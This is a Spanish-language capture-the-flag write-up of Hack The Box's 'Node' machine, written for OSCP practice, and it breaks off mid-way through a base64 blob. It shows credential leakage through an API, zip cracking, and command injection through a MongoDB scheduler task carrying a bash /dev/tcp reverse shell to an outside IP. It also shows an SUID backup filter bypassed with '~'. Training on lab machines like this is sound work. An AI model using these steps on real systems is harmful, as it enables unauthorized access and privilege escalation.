<!DOCTYPE html>
<html lang="es"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>OSCP Path ~ Node de Hack The Box (Necesario VIP) | Pirrandi Blog</title>
<meta name="generator" content="Jekyll v3.9.3" />
<meta property="og:title" content="OSCP Path ~ Node de Hack The Box (Necesario VIP)" />
<meta name="author" content="Pirrandi" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Writeup de la maquina de HackTheBox llamada NODE siguiendo el PATH para el OSCP" />
<meta property="og:description" content="Writeup de la maquina de HackTheBox llamada NODE siguiendo el PATH para el OSCP" />
<link rel="canonical" href="http://localhost:4000/2021/07/22/Node.html" />
<meta property="og:url" content="http://localhost:4000/2021/07/22/Node.html" />
<meta property="og:site_name" content="Pirrandi Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2021-07-22T00:00:00-03:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="OSCP Path ~ Node de Hack The Box (Necesario VIP)" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"Pirrandi"},"dateModified":"2021-07-22T00:00:00-03:00","datePublished":"2021-07-22T00:00:00-03:00","description":"Writeup de la maquina de HackTheBox llamada NODE siguiendo el PATH para el OSCP","headline":"OSCP Path ~ Node de Hack The Box (Necesario VIP)","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2021/07/22/Node.html"},"url":"http://localhost:4000/2021/07/22/Node.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css">
  <link rel="icon" type="image/png" href="/assets/favicon.png" /><link type="application/atom+xml" rel="alternate" href="http://localhost:4000/feed.xml" title="Pirrandi Blog" /></head>
<body><div class="site-header">
  <div class="wrapper">
    <a class="site-title" rel="author" href="/">Pirrandi Blog<b class="command_prompt"></b><b class="blinking_cursor">_</b></a>
    <span class="social_links">
        <a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a><a class="color--hover" href=""><i class="fab fa-"></i></a>
    </span>
  </div>
</div>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        
  <div class="author-box">
    
    
        <img src="" class="author-avatar" alt="Avatar" />
    
Este es mi blog personal sobre Conceptos Hacking Etico // HTB // TryHackMe // Resumenes de Hacking // Herramientas para distintas tareas.

</div>


<div class="post">
  <h1 class="post-title">OSCP Path ~ Node de Hack The Box (Necesario VIP)</h1>
  
  <div class="post-tags">
     
      <a class="tag" href="/tag/HTB,/">HTB,</a>
      
      <a class="tag" href="/tag/OSCP/">OSCP</a>
      
      <a class="tag" href="/tag/Path,/">Path,</a>
      
      <a class="tag" href="/tag/app-js,/">app-js,</a>
      
      <a class="tag" href="/tag/fcrackzip,/">fcrackzip,</a>
      
      <a class="tag" href="/tag/MongoDB,/">MongoDB,</a>
      
      <a class="tag" href="/tag/Scheduler,/">Scheduler,</a>
      
      <a class="tag" href="/tag/Cron-taks,/">Cron-taks,</a>
      
      <a class="tag" href="/tag/Maquinas/">Maquinas</a>
      
      <a class="tag" href="/tag/Retiradas,/">Retiradas,</a>
      
      <a class="tag" href="/tag/Writeup,/">Writeup,</a>
      
      <a class="tag" href="/tag/Hacking/">Hacking</a>
      
  </div>
  
  <div class="post-date">Published on 22 Jul 2021</div>
  
  <noscript>
    <div class="post-description">Writeup de la maquina de HackTheBox llamada NODE siguiendo el PATH para el OSCP</div>
  </noscript>
  <div id="animated-post-description" class="post-description" style="display: none;"></div>
  
  <h1 id="node--hack-the-box-to-oscp">Node ~ Hack The Box to OSCP</h1>

<p>Realizamos el Primer escaneo con Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="s2">$" nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.58       "</span>
</code></pre></div></div>
<p>Procedemos con el siguiente escaneo de Nmap</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>		PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da <span class="o">(</span>RSA<span class="o">)</span>
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 <span class="o">(</span>ED25519<span class="o">)</span>
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: /login
| hadoop-tasktracker-info: 
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>

<p>Entramos para visualizar la web por el puerto 3000</p>

<p>Hacemos CTRL + U</p>

<p>Encontramos esto en js que hace referencia a una app pinchamos en + /profile/`</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">script</span> <span class="nx">type</span><span class="o">=</span><span class="dl">"</span><span class="s2">text/javascript</span><span class="dl">"</span> <span class="nx">src</span><span class="o">=</span><span class="dl">"</span><span class="s2">assets/js/app/controllers/profile.js</span><span class="dl">"</span><span class="o">&gt;&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span></code></pre></div></div>
<p>hacemos una peticion <code class="language-plaintext highlighter-rouge">Curl</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Procedemos pinchando en /assets/js/app/controllers/profile.js
<span class="c"># curl -s -X GET "http://10.10.10.58:3000/assets/js/app/controllers/profile.js"                                                                                                                               4 ⨯</span>
var controllers <span class="o">=</span> angular.module<span class="o">(</span><span class="s1">'controllers'</span><span class="o">)</span><span class="p">;</span>

controllers.controller<span class="o">(</span><span class="s1">'ProfileCtrl'</span>, <span class="k">function</span> <span class="o">(</span><span class="nv">$scope</span>, <span class="nv">$http</span>, <span class="nv">$routeParams</span><span class="o">)</span> <span class="o">{</span>
  <span class="nv">$http</span>.get<span class="o">(</span><span class="s2">"'/api/users/'"</span> + <span class="nv">$routeParams</span>.username<span class="o">)</span>
    .then<span class="o">(</span><span class="k">function</span> <span class="o">(</span>res<span class="o">)</span> <span class="o">{</span>
      <span class="nv">$scope</span>.user <span class="o">=</span> res.data<span class="p">;</span>
    <span class="o">}</span>, <span class="k">function</span> <span class="o">(</span>res<span class="o">)</span> <span class="o">{</span>
      <span class="nv">$scope</span>.hasError <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>

      <span class="k">if</span> <span class="o">(</span>res.status <span class="o">==</span> 404<span class="o">)</span> <span class="o">{</span>
        <span class="nv">$scope</span>.errorMessage <span class="o">=</span> <span class="s1">'This user does not exist'</span><span class="p">;</span>
      <span class="o">}</span>
      <span class="k">else</span> <span class="o">{</span>
        <span class="nv">$scope</span>.errorMessage <span class="o">=</span> <span class="s1">'An unexpected error occurred'</span><span class="p">;</span>
      <span class="o">}</span>
    <span class="o">})</span><span class="p">;</span>
<span class="o">})</span><span class="p">;</span>
</code></pre></div></div>
<p>Nos devuelve una ruta potencial: /api/users/
Procedemos a apuntar a ella y encontramos unas credenciales</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># curl -s -X GET "http://10.10.10.58:3000/api/users/" |  jq                                                                                                                                                 123 ⨯</span>
<span class="o">[</span>
  <span class="o">{</span>
    <span class="s2">"_id"</span>: <span class="s2">"59a7365b98aa325cc03ee51c"</span>,
    <span class="s2">"username"</span>: <span class="s2">"myP14ceAdm1nAcc0uNT"</span>,
    <span class="s2">"password"</span>: <span class="s2">"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af"</span>,
    <span class="s2">"is_admin"</span>: <span class="nb">true</span>
  <span class="o">}</span>,
  <span class="o">{</span>
    <span class="s2">"_id"</span>: <span class="s2">"59a7368398aa325cc03ee51d"</span>,
    <span class="s2">"username"</span>: <span class="s2">"tom"</span>,
    <span class="s2">"password"</span>: <span class="s2">"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240"</span>,
    <span class="s2">"is_admin"</span>: <span class="nb">false</span>
  <span class="o">}</span>,
  <span class="o">{</span>
    <span class="s2">"_id"</span>: <span class="s2">"59a7368e98aa325cc03ee51e"</span>,
    <span class="s2">"username"</span>: <span class="s2">"mark"</span>,
    <span class="s2">"password"</span>: <span class="s2">"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73"</span>,
    <span class="s2">"is_admin"</span>: <span class="nb">false</span>
  <span class="o">}</span>,
  <span class="o">{</span>
    <span class="s2">"_id"</span>: <span class="s2">"59aa9781cced6f1d1490fce9"</span>,
    <span class="s2">"username"</span>: <span class="s2">"rastating"</span>,
    <span class="s2">"password"</span>: <span class="s2">"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0"</span>,
    <span class="s2">"is_admin"</span>: <span class="nb">false</span>
  <span class="o">}</span>
<span class="o">]</span>
</code></pre></div></div>
<p>Credenciales:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>User que es admin
user: myP14ceAdm1nAcc0uNT
pass: manchester
</code></pre></div></div>
<p>Accedemos – nos descargamos un archivo : <code class="language-plaintext highlighter-rouge">myplace.backup</code></p>

<p>Le hacemos un cat al archivo vemos que esta en base64 asique procedemos a decodificarlo</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat myplace.backup| base64 -d &gt;&gt; myplace</span>
<span class="c"># file myplace     </span>
myplace: Zip archive data, at least v1.0 to extract
<span class="c"># 7z x myplace  ------- NOS PIDE CONTRASEÑA</span>
</code></pre></div></div>
<p>Procdemos a intentar crackearlo con la herramienta fcrackzip</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ls</span>
myplace  myplace.backup
<span class="c"># fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt -v myplace </span>
PASSWORD FOUND!!!!: pw <span class="o">==</span> <span class="s2">"magicword"</span>
</code></pre></div></div>
<p>Vemos que hemos obtenido un monton de directorios con recursos, nos metemops en <code class="language-plaintext highlighter-rouge">/var/www/myplace</code></p>

<p>Filtramos por una busqueda para encontrar datos relevantes en los archivos</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat app.js | grep -i -E "user|pass|db"                                                                                                                                                                      1 ⨯</span>
const MongoClient <span class="o">=</span> require<span class="o">(</span><span class="s1">'mongodb'</span><span class="o">)</span>.MongoClient<span class="p">;</span>
const ObjectID    <span class="o">=</span> require<span class="o">(</span><span class="s1">'mongodb'</span><span class="o">)</span>.ObjectID<span class="p">;</span>
const url         <span class="o">=</span> <span class="s1">'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&amp;authSource=myplace'</span><span class="p">;</span>
MongoClient.connect<span class="o">(</span>url, <span class="k">function</span><span class="o">(</span>error, db<span class="o">)</span> <span class="o">{</span>
  <span class="k">if</span> <span class="o">(</span>error <span class="o">||</span> <span class="o">!</span>db<span class="o">)</span> <span class="o">{</span>
    console.log<span class="o">(</span><span class="s1">'[!] Failed to connect to mongodb'</span><span class="o">)</span><span class="p">;</span>
</code></pre></div></div>
<p>Credenciales Obtenidas:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mark: 5AYRft73VtFpc84k
</code></pre></div></div>
<p>Entramos con estas credenciales por SSH por la reutilizacion de credenciales.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># ssh mark@10.10.10.58 </span>

mark@node:~<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-la</span>
total 24
drwxr-xr-x 3 root root 4096 Sep  3  2017 <span class="nb">.</span>
drwxr-xr-x 5 root root 4096 Aug 31  2017 ..
<span class="nt">-rw-r--r--</span> 1 root root  220 Aug 31  2017 .bash_logout
<span class="nt">-rw-r--r--</span> 1 root root 3771 Aug 31  2017 .bashrc
drwx------ 2 root root 4096 Aug 31  2017 .cache
<span class="nt">-rw-r-----</span> 1 root root    0 Sep  3  2017 .dbshell
<span class="nt">-rwxr-xr-x</span> 1 root root    0 Sep  3  2017 .mongorc.js
<span class="nt">-rw-r--r--</span> 1 root root  655 Aug 31  2017 .profile
</code></pre></div></div>
<p>Intentando enumerar el sistema un poco vemos que tenemos en /var/</p>

<p>encontramos el directorio /scheduler/ que suele ser para tareas cron a nivel de sistema o tiene relacion</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mark@node:/var/scheduler<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span>
total 20
<span class="nt">-rw-rw-r--</span>  1 root root  910 Sep  3  2017 app.js
drwxr-xr-x 19 root root 4096 Sep  3  2017 node_modules
<span class="nt">-rw-rw-r--</span>  1 root root  176 Sep  3  2017 package.json
<span class="nt">-rw-r--r--</span>  1 root root 4709 Sep  3  2017 package-lock.json
</code></pre></div></div>
<p>lanzamos un script <code class="language-plaintext highlighter-rouge">procmon</code>
para detectar tareas CRON a nivel de sistema</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/bin/mongod <span class="nt">--auth</span> <span class="nt">--quiet</span> <span class="nt">--config</span> /etc/mongod.conf
scheduler <span class="nt">--</span>?¿ <span class="nt">--</span> Son tareas Cron a nivel de base de datos MONGO DB
<span class="o">&gt;</span> /usr/bin/node /var/scheduler/app.js
</code></pre></div></div>
<p>Probamos a conectarnos a la base de datos mongo que aparece bastante con las credenciales del</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user: mark
pass: 5AYRft73VtFpc84k
</code></pre></div></div>
<h1 id="mongo-db">Mongo-DB</h1>
<p>Procedemos a injectar una tarea en la colleccion tasks</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mark@node:/var/tmp/Cron-Finder<span class="nv">$ </span>mongo <span class="nt">-u</span> mark <span class="nt">-p</span> 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
<span class="o">&gt;</span> show collections
tasks
<span class="o">&gt;</span> db.task.find<span class="o">()</span>
<span class="o">&gt;</span> db.task.insertOne<span class="o">({</span>cmd: <span class="s2">"bash /tmp/shell.sh"</span><span class="o">})</span><span class="p">;</span>
2021-07-22T00:33:47.675+0100 E QUERY    <span class="o">[</span>thread1] TypeError: db.task.instertOne is not a <span class="k">function</span> :
@<span class="o">(</span>shell<span class="o">)</span>:1:1

<span class="o">&gt;</span> db.task.find<span class="o">()</span>  <span class="nt">---</span> lo ejecutamos hasta que desaparezca que sera cuandoi se ejecute el tinglado para entrar como el usuario TOM
</code></pre></div></div>
<p>volvemos a tener que instertar la tarea</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="o">&gt;</span> db.tasks.insertOne<span class="o">({</span>cmd: <span class="s2">"bash /tmp/shell.sh"</span><span class="o">})</span><span class="p">;</span>
 <span class="o">&gt;</span> db.task.find<span class="o">()</span>   <span class="nt">---</span> lo ejecutamos hasta que desaparezca que sera cuandoi se ejecute el tinglado para entrar como el usuario TOM
</code></pre></div></div>
<p>Previamente para que esto funcione nos montamos la <code class="language-plaintext highlighter-rouge">/tmp/shell.sh</code>, es importante hacer un <code class="language-plaintext highlighter-rouge">chmod +x shell.sh</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bash <span class="nt">-i</span> <span class="o">&gt;</span>&amp; /dev/tcp/10.10.14.12/443 0&gt;&amp;1
</code></pre></div></div>
<p>Y esta si que nos lanza la shell directamente atraves de la tarea escrita en mongodb, pillamos la flag user.txt</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># nc -vlnp 444 : 
tom@node:~$ ls
user.txt
tom@node:~$ cat user.txt 
e1156acc3574e04b06908exxxxxxxxx
</code></pre></div></div>
<p># Privesc root</p>

<p>Una vez conseguida la shell para el user TOM, procedemos a apuntar al archivo <code class="language-plaintext highlighter-rouge">app.js</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Encontramos esto en parte del codigo de la app js:

var proc <span class="o">=</span> spawn<span class="o">(</span><span class="s1">'/usr/local/bin/backup'</span>, <span class="o">[</span><span class="s1">'-q'</span>, backup_key, __dirname <span class="o">])</span><span class="p">;</span>
</code></pre></div></div>
<p>Chequeamos:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tom@node:/<span class="nv">$ </span><span class="nb">ls</span> /usr/local/bin/backup                                                                                                                                          
/usr/local/bin/backup                                                                                                                                                         
tom@node:/<span class="nv">$ </span><span class="nb">ls</span> <span class="nt">-l</span> /usr/local/bin/backup
<span class="nt">-rwsr-xr--</span> 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup
</code></pre></div></div>
<p>Procedemos a ejecutarlo para ver lo que ocurre:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tom@node:/usr/local/bin<span class="nv">$ </span>backup asdfa asdfa /root/



             ____________________________________________________
            /                                                    <span class="se">\</span>
           |    _____________________________________________     |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |             Secure Backup v1.0              |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |_____________________________________________|    |
           |                                                      |
            <span class="se">\_</span>____________________________________________________/
                   <span class="se">\_</span>______________________________________/
                _______________________________________________
             _-<span class="s1">'    .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.  --- `-_
          _-'</span>.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--.  .-.-.<span class="sb">`</span><span class="nt">-_</span>
       _-<span class="s1">'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
    _-'</span>.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.<span class="sb">`</span><span class="nt">-_</span>
 _-<span class="s1">'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'</span>


 <span class="o">[!]</span> Ah-ah-ah! You didn<span class="s1">'t say the magic word!
</span></code></pre></div></div>
<p>Procedemos a ejecutarlo otra vez pero con el uso de la herramienta <code class="language-plaintext highlighter-rouge">ltrace</code> y en vez del directorio <code class="language-plaintext highlighter-rouge">/root</code> que es el primero que usamos, lo hacemos con <code class="language-plaintext highlighter-rouge">/tmp</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Vemos que conm ltrace nos devuelve lo siguiente relevante:
strstr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s2">".."</span><span class="o">)</span>                                                                                                               <span class="o">=</span> nil                                         
strstr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s2">"/root"</span><span class="o">)</span>                                                                                                            <span class="o">=</span> nil                                         
strchr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s1">';'</span><span class="o">)</span>                                                                                                                <span class="o">=</span> nil                                         
strchr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s1">'&amp;'</span><span class="o">)</span>                                                                                                                <span class="o">=</span> nil                                         
strchr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s1">'`'</span><span class="o">)</span>                                                                                                                <span class="o">=</span> nil                                         
strchr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s1">'$'</span><span class="o">)</span>                                                                                                                <span class="o">=</span> nil                                         
strchr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s1">'|'</span><span class="o">)</span>                                                                                                                <span class="o">=</span> nil                                         
strstr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s2">"//"</span><span class="o">)</span>                                                                                                               <span class="o">=</span> nil                                         
strcmp<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s2">"/"</span><span class="o">)</span>                                                                                                                <span class="o">=</span> 1                                           
strstr<span class="o">(</span><span class="s2">"/tmp"</span>, <span class="s2">"/etc"</span><span class="o">)</span> 
<span class="nt">--------------</span>
fopen<span class="o">(</span><span class="s2">"/etc/myplace/keys"</span>, <span class="s2">"r"</span><span class="o">)</span>
</code></pre></div></div>
<p>Filtra por esos caracteres para a la hora de ejecutar el backup + key + /path/ y que no tenga esos caracteres en la ruta, si los tiene = TROLL FACE</p>

<p>Procedemos a hacer una <code class="language-plaintext highlighter-rouge">cat /etc/myplace/keys</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tom@node:/var/www/myplace<span class="nv">$ </span><span class="nb">cat</span> /etc/myplace/keys                                                                                                                       
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508                                                            
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110  <span class="nt">-----</span> Usamos esta 
</code></pre></div></div>
<p>Pasandole la key e intentando hacer el backup del directorio /root … .. .</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tom@node:/var/www/myplace<span class="nv">$ </span> /usr/local/bin/backup asda 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110  /root
</code></pre></div></div>
<p>Filtra por esos caracteres para a la hora de ejecutar el backup + key + /path/ y que no tenga esos caracteres en la ruta, si los tiene = TROLL FACE</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># cat root.txt</span>
QQQQQQQQQQQQQQQD!<span class="sb">`</span>__ssaaaaaaaaaass_ass_s____.  -~<span class="s2">""</span>??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP<span class="s1">'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW'</span> jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2<span class="nv">$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc</span><span class="o">)</span>WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP<span class="s1">'.yQQQQQQQQQQQP"       &lt;wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'</span>_a.&lt;aamQQQW!&lt;yF <span class="s2">"!</span><span class="sb">`</span> ..  <span class="s2">"??</span><span class="nv">$Qa</span><span class="s2"> "</span>WQQQWTVP<span class="s1">'    "??'</span> <span class="o">=</span>QQmWWV?46/ ?QQQQQ
QQQP<span class="s1">'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. &lt;wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'</span>adQQP4ga, -????<span class="s2">" &lt;jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"</span><span class="sb">`</span><span class="s2">  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?</span><span class="nv">$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc</span><span class="s2"> "</span>4QQQQa   .QP4QQQQfWkl jQQQ
QE <span class="o">]</span>QkQk <span class="nv">$D</span>?<span class="sb">`</span>  waa <span class="s2">"?9WWQQQP??T?47</span><span class="sb">`</span>_aamQQQQQQWWQw,-?QWWQQQQQ<span class="sb">`</span><span class="s2">"</span>QQQD<span class="se">\Q</span>f<span class="o">(</span>.QWQQ
QQ,-Qm4Q/-QmQ6 <span class="s2">"WWQma/  "</span>??QQQQQQL 4W<span class="s2">"- -?</span><span class="nv">$QQQQWP</span><span class="sb">`</span>s,awT<span class="nv">$QQQ</span>@  <span class="s2">"QW@?</span><span class="nv">$:</span><span class="s2">.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???</span><span class="nv">$waQQQQQQQQF</span><span class="s2">??'&lt;mWWWWWQW?^  </span><span class="sb">`</span> <span class="o">]</span>6QQ<span class="s1">' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc &lt;aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk &lt;c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'</span>.mQQQmaa,.,                <span class="nb">.</span> .<span class="p">;</span> QWQ.]QQQQQQQ
QQQQQQQQQWQa ?<span class="nv">$WQQWQQQQQa</span>,.<span class="s2">"?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "</span>9gw?9gdB?QQwa, -??T<span class="nv">$WQQ</span><span class="p">;</span>:QQQWQ <span class="o">]</span>WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws <span class="s2">"Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??</span><span class="nv">$QwadV</span><span class="s2">}&lt;wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ

nos devuelve una troll face porque justamente vemos que filtra por badcharacteres /root/
</span></code></pre></div></div>

<p>Vemos que el simbolito de cd ~ que sirve para apuntar al directorio /home/ no esta contemplado en los badchars.</p>

<p>Procedemos a cambiar la variable HOME por /root/ para cuando hagamos cd ~ y ese simbolito que justamente no esta filtrado en el script de arriba y sirve para referenciar el directorio root nos apunte al directorio root.</p>

<p>Ejecutando elarchivo backup correctamente tras cambiar la variable /HOME/:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tom@node:/$ /usr/local/bin/backup asda 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
</code></pre></div></div>
<p>Nos devuelve una cadena en base64:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo "UEsDBAoAAAAAABwWO0sAAAAAAAAAAAAAAAAFABwAcm9vdC9VVAkAA4cDy1nlg/pgdXgLAAEEAAAAAAQAAAAAUEsDBBQACQAIANGDEUd/sK5kgwAAAJQAAAANABwAcm9vdC8ucHJvZmlsZVVUCQADGf7RVa6xYFp1eAsAAQQAAAAABAAAAACxQNsymRu0veDVi17hTOMYZsokd8EwtnyjU7fut1+OhVK0D7G4T+P03MbzLM10kp+7PW0mQjrNIOH6OlsV34T4O1kY43mcP8nsvKPi3bRM/V7pTMeHD4aJVwX9Fpb7riq2KGrUxHkcAqS6WuZmnTPL4MhwW9Xav4zzk4Cq71hdYOxlq1BLBwh/sK5kgwAAAJQAAABQSwMEFAAJAAgAHBY7S9xSZRxNAAAAVQAAABIAHAByb290Ly5iYXNoX2hpc3RvcnlVVAkAA4cDy1musWBadXgLAAEEAAAAAAQAAAAAGdos3hlJi5iua6GZQoWbbXnl1aBzHahA0HbKrT/1UUUM1QaYtsQF6iQG0k3qfkeFkZ1fi4dkOR2PLcADLZBW+qbAEXUPntXJcDTMU3dQSwcI3FJlHE0AAABVAAAAUEsDBAoAAAAAADR8I0sAAAAAAAAAAAAAAAAMABwAcm9vdC8uY2FjaGUvVVQJAAPDEqxZ5YP6YHV4CwABBAAAAAAEAAAAAFBLAwQKAAkAAAA0fCNLAAAAAAwAAAAAAAAAIAAcAHJvb3QvLmNhY2hlL21vdGQubGVnYWwtZGlzcGxheWVkVVQJAAPDEqxZwxKsWXV4CwABBAAAAAAEAAAAALY4ELcZABxbShwvHlBLBwgAAAAADAAAAAAAAABQSwMECgAJAAAA1H0jS/KON0AtAAAAIQAAAA0AHAByb290L3Jvb3QudHh0VVQJAAPQFaxZSgDLWXV4CwABBAAAAAAEAAAAAKr0YbUxXR0ZaIcKL6UZaHN4jvLG34u9I8c/pjvyulxfuBtNi1DApEo/6Ko2AFBLBwjyjjdALQAAACEAAABQSwMEFAAJAAgA65FWR73lED6bBQAAIgwAAAwAHAByb290Ly5iYXNocmNVVAkAA6kZKVausWBadXgLAAEEAAAAAAQAAAAAnlj+Csh+xe8WgqfQ4q1H8mlhOIBMVUq6f+ZfI8OkJI1Z+V7/V+0hsq/UypZYhbq3bcTtIXHskNK86N9Boehwx+g3vucK5HuVWaXGyHuET5M9XUTpi8k